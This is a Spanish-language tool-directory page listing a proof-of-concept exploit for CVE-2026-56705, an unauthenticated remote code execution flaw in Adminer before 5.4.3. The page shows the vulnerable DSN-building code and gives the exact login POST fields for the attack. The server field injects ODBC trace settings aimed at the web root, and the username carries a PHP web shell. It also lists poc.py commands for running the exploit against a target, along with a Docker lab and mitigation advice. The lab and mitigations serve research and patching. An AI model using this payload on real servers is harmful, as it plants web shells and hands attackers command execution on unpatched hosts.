Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-56705 — PoC exploit para Adminer < 5.4.3 RCE no autenticado mediante inyección de DSN PDO MSSQL, incluyendo laboratorio Docker y prueba negativa. | Kitploit
Herramientas/GitHubGitHub/boreas37/cve-2026-56705
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingLabs y Práctica
GitHubboreas37/cve-2026-56705

CVE-2026-56705

PoC exploit para Adminer < 5.4.3 RCE no autenticado mediante inyección de DSN PDO MSSQL, incluyendo laboratorio Docker y prueba negativa.

Ver Repositorio
2hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-56705: Adminer < 5.4.3 — RCE no autenticado mediante inyección de DSN PDO MSSQL

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (aviso del proveedor) / GHSA-34q8-53jm-qc2r (base de datos de GitHub)
ProductoAdminer (herramienta de gestión de bases de datos PHP de un solo archivo)
AfectadoAdminer < 5.4.3 con pdo_sqlsrv + Microsoft ODBC Driver para SQL Server
Corregido en5.4.3
CVSS9.8 Crítico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
TipoCWE-20 → escritura arbitraria de archivos no autenticada → RCE

Resumen

Adminer no sanea el campo server proporcionado por el usuario antes de construir el DSN de PDO para conexiones MSSQL:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

Los puntos y comas en server se tratan como delimitadores de atributos de conexión ODBC, por lo que un atacante no autenticado puede añadir atributos arbitrarios al DSN — incluidos TraceFile y TraceOn. La función de rastreo de unixODBC escribe la cadena de conexión completa (con UID={username} tal cual) en TraceFile antes e independientemente de que el intento de conexión tenga éxito. Inyectar código PHP a través del campo username y apuntar TraceFile a la raíz web produce una web shell.

Una única petición POST de inicio de sesión no autenticada es suficiente. No se necesitan credenciales válidas ni interacción del usuario.

Explotación

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. El POST de inicio de sesión construye el DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. El administrador de controladores ODBC escribe un rastro que contiene UID={<?php ... ?>} en /var/www/shell.php
  3. La conexión falla (esperado, irrelevante) — el archivo ya está escrito
  4. GET /shell.php?c=id → el comando se ejecuta

Uso

root@kitploit:~
# solo huella
python3 poc.py --target http://target/adminer.php --check

# explotación completa (escribe <random>.php en la raíz web)
python3 poc.py --target http://target/adminer.php --command "id"

Reproducción en laboratorio

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

La imagen del laboratorio replica exactamente los requisitos del aviso: php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18, con la raíz web escribible por el proceso PHP.

Mitigación

  • Actualice a Adminer 5.4.3+.
  • Si no puede actualizar de inmediato: elimine/bloquee el controlador mssql, o elimine ; (y espacios en blanco) de los valores server proporcionados por el usuario en un proxy inverso.
  • Restrinja la raíz web contra escrituras del usuario PHP-FPM/CLI como defensa en profundidad.

Créditos

El aviso del proveedor atribuye el descubrimiento conjuntamente al informante y a Yashar Shahinzadeh (@voorivex).

PoC y laboratorio: Hamza Cagrici (@Boreas37)

Cronología

FechaEvento
2026-08-25CVE publicado / corregido en Adminer 5.4.3
Descargar herramienta